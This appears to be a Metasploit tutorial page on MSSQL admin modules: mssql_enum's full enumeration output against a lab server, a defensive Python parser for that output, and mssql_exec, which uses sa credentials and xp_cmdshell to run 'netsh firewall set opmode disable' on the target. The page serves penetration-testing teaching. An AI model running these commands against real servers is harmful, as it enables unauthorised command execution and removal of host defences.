mssql_enum

The mssql_enum module is an admin module that accepts a set of credentials and queries an MSSQL server for various configuration settings.

msf > use auxiliary/admin/mssql/mssql_enum
msf auxiliary(mssql_enum) > show options

Module options (auxiliary/admin/mssql/mssql_enum):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   PASSWORD                              no        The password for the specified username
   RHOST                                 yes       The target address
   RPORT                1433             yes       The target port (TCP)
   TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)

To configure the module, we accept the default username, set our PASSWORD and RHOST, then let it run.

msf auxiliary(mssql_enum) > set PASSWORD password1
PASSWORD => password1
msf auxiliary(mssql_enum) > set RHOST 192.168.1.195
RHOST => 192.168.1.195
msf auxiliary(mssql_enum) > run

[*] Running MS SQL Server Enumeration...
[*] Version:
[*]	Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) 
[*]		Oct 14 2005 00:33:37 
[*]		Copyright (c) 1988-2005 Microsoft Corporation
[*]		Express Edition on Windows NT 5.1 (Build 2600: Service Pack 2)
[*] Configuration Parameters:
[*] 	C2 Audit Mode is Not Enabled
[*] 	xp_cmdshell is Not Enabled
[*] 	remote access is Enabled
[*] 	allow updates is Not Enabled
[*] 	Database Mail XPs is Not Enabled
[*] 	Ole Automation Procedures are Not Enabled
[*] Databases on the server:
[*] 	Database name:master
[*] 	Database Files for master:
[*] 		c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\master.mdf
[*] 		c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\mastlog.ldf
[*] 	Database name:tempdb
[*] 	Database Files for tempdb:
[*] 		c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\tempdb.mdf
[*] 		c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\templog.ldf
[*] 	Database name:model
[*] 	Database Files for model:
[*] 		c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\model.mdf
[*] 		c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\modellog.ldf
[*] 	Database name:msdb
[*] 	Database Files for msdb:
[*] 		c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\MSDBData.mdf
[*] 		c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\MSDBLog.ldf
[*] System Logins on this Server:
[*] 	sa
[*] 	##MS_SQLResourceSigningCertificate##
[*] 	##MS_SQLReplicationSigningCertificate##
[*] 	##MS_SQLAuthenticatorCertificate##
[*] 	##MS_AgentSigningCertificate##
[*] 	BUILTIN\Administrators
[*] 	NT AUTHORITY\SYSTEM
[*] 	V-MAC-XP\SQLServer2005MSSQLUser$V-MAC-XP$SQLEXPRESS
[*] 	BUILTIN\Users
[*] Disabled Accounts:
[*] 	No Disabled Logins Found
[*] No Accounts Policy is set for:
[*] 	All System Accounts have the Windows Account Policy Applied to them.
[*] Password Expiration is not checked for:
[*] 	sa
[*] System Admin Logins on this Server:
[*] 	sa
[*] 	BUILTIN\Administrators
[*] 	NT AUTHORITY\SYSTEM
[*] 	V-MAC-XP\SQLServer2005MSSQLUser$V-MAC-XP$SQLEXPRESS
[*] Windows Logins on this Server:
[*] 	NT AUTHORITY\SYSTEM
[*] Windows Groups that can logins on this Server:
[*] 	BUILTIN\Administrators
[*] 	V-MAC-XP\SQLServer2005MSSQLUser$V-MAC-XP$SQLEXPRESS
[*] 	BUILTIN\Users
[*] Accounts with Username and Password being the same:
[*] 	No Account with its password being the same as its username was found.
[*] Accounts with empty password:
[*] 	No Accounts with empty passwords where found.
[*] Stored Procedures with Public Execute Permission found:
[*] 	sp_replsetsyncstatus
[*] 	sp_replcounters
[*] 	sp_replsendtoqueue
[*] 	sp_resyncexecutesql
[*] 	sp_prepexecrpc
[*] 	sp_repltrans
[*] 	sp_xml_preparedocument
[*] 	xp_qv
[*] 	xp_getnetname
[*] 	sp_releaseschemalock
[*] 	sp_refreshview
[*] 	sp_replcmds
[*] 	sp_unprepare
[*] 	sp_resyncprepare
[*] 	sp_createorphan
[*] 	xp_dirtree
[*] 	sp_replwritetovarbin
[*] 	sp_replsetoriginator
[*] 	sp_xml_removedocument
[*] 	sp_repldone
[*] 	sp_reset_connection
[*] 	xp_fileexist
[*] 	xp_fixeddrives
[*] 	sp_getschemalock
[*] 	sp_prepexec
[*] 	xp_revokelogin
[*] 	sp_resyncuniquetable
[*] 	sp_replflush
[*] 	sp_resyncexecute
[*] 	xp_grantlogin
[*] 	sp_droporphans
[*] 	xp_regread
[*] 	sp_getbindtoken
[*] 	sp_replincrementlsn
[*] Instances found on this server:
[*] 	SQLEXPRESS
[*] Default Server Instance SQL Server Service is running under the privilege of:
[*] 	xp_regread might be disabled in this system
[*] Auxiliary module execution completed
msf auxiliary(mssql_enum) >
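The enumeration above is only useful if someone turns it into findings. As an added example (not part of the original page or of Metasploit), the following Python script parses mssql_enum's `[*]`-prefixed output into sections and flags the items a defender would want to fix: dangerous features that are enabled, auditing that is off, logins without password expiration, and extended procedures that PUBLIC may execute. The sample text is a constructed excerpt in the module's output format, and the lists of "risky" settings and procedures are this example's own choices.

```python
import re

# Constructed excerpt in the format mssql_enum prints (a tab after "[*] " marks an item).
SAMPLE_OUTPUT = """\
[*] Configuration Parameters:
[*] \tC2 Audit Mode is Not Enabled
[*] \tremote access is Enabled
[*] Password Expiration is not checked for:
[*] \tsa
[*] Stored Procedures with Public Execute Permission found:
[*] \tsp_refreshview
[*] \txp_dirtree
"""

# Settings the module reports and the state a hardened server should show (example's choice).
WANT_DISABLED = {"xp_cmdshell", "remote access", "Ole Automation Procedures", "Database Mail XPs", "allow updates"}
WANT_ENABLED = {"C2 Audit Mode"}
# Extended procedures whose PUBLIC execute right deserves review (example's choice).
RISKY_PUBLIC_PROCS = {"xp_dirtree", "xp_fileexist", "xp_fixeddrives", "xp_regread", "xp_grantlogin", "xp_revokelogin"}

def parse_sections(text):
    """Group '[*]' lines into {section header: [items]}; tab-indented lines are items."""
    sections, current = {}, None
    for line in text.splitlines():
        if not line.startswith("[*] "):
            continue
        body = line[4:]
        if body.startswith("\t") and current is not None:
            sections[current].append(body.strip())
        elif not body.startswith("\t"):
            current = body.rstrip(":")
            sections[current] = []
    return sections

def findings(text):
    """Return human-readable findings a defender would want to fix."""
    s, out = parse_sections(text), []
    for item in s.get("Configuration Parameters", []):
        m = re.match(r"(.+?) (?:is|are) (Not Enabled|Enabled)$", item)
        if m is None:
            continue
        name, enabled = m.group(1), m.group(2) == "Enabled"
        if (name in WANT_DISABLED and enabled) or (name in WANT_ENABLED and not enabled):
            out.append(f"config: {name} is {'enabled' if enabled else 'disabled'}")
    for login in s.get("Password Expiration is not checked for", []):
        out.append(f"no password expiration: {login}")
    for proc in s.get("Stored Procedures with Public Execute Permission found", []):
        if proc in RISKY_PUBLIC_PROCS:
            out.append(f"PUBLIC can execute {proc}")
    return out
```

Running `findings(SAMPLE_OUTPUT)` on the constructed excerpt reports the disabled C2 audit mode, the enabled remote access setting, the sa login without password expiration, and PUBLIC execute on xp_dirtree, while sp_refreshview is left alone.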

mssql_exec

The mssql_exec admin module takes advantage of the xp_cmdshell stored procedure to execute commands on the remote system. If you have acquired or guessed MSSQL admin credentials, this can be a very useful module.

msf > use auxiliary/admin/mssql/mssql_exec
msf auxiliary(mssql_exec) > show options

Module options (auxiliary/admin/mssql/mssql_exec):

   Name                 Current Setting                       Required  Description
   ----                 ---------------                       --------  -----------
   CMD                  cmd.exe /c echo OWNED > C:\owned.exe  no        Command to execute
   PASSWORD                                                   no        The password for the specified username
   RHOST                                                      yes       The target address
   RPORT                1433                                  yes       The target port (TCP)
   TDSENCRYPTION        false                                 yes       Use TLS/SSL for TDS data "Force Encryption"
   USERNAME             sa                                    no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false                                 yes       Use windows authentification (requires DOMAIN option set)

We set our RHOST and PASSWORD values and set CMD to a command that disables the Windows Firewall on the remote system. This may in turn allow us to exploit other services running on the target.

msf auxiliary(mssql_exec) > set CMD netsh firewall set opmode disable
CMD => netsh firewall set opmode disable
msf auxiliary(mssql_exec) > set PASSWORD password1
PASSWORD => password1
msf auxiliary(mssql_exec) > set RHOST 192.168.1.195
RHOST => 192.168.1.195
msf auxiliary(mssql_exec) > run

[*] The server may have xp_cmdshell disabled, trying to enable it...
[*] SQL Query: EXEC master..xp_cmdshell 'netsh firewall set opmode disable'



 output
 ------
 Ok.
 
 

[*] Auxiliary module execution completed
msf auxiliary(mssql_exec) >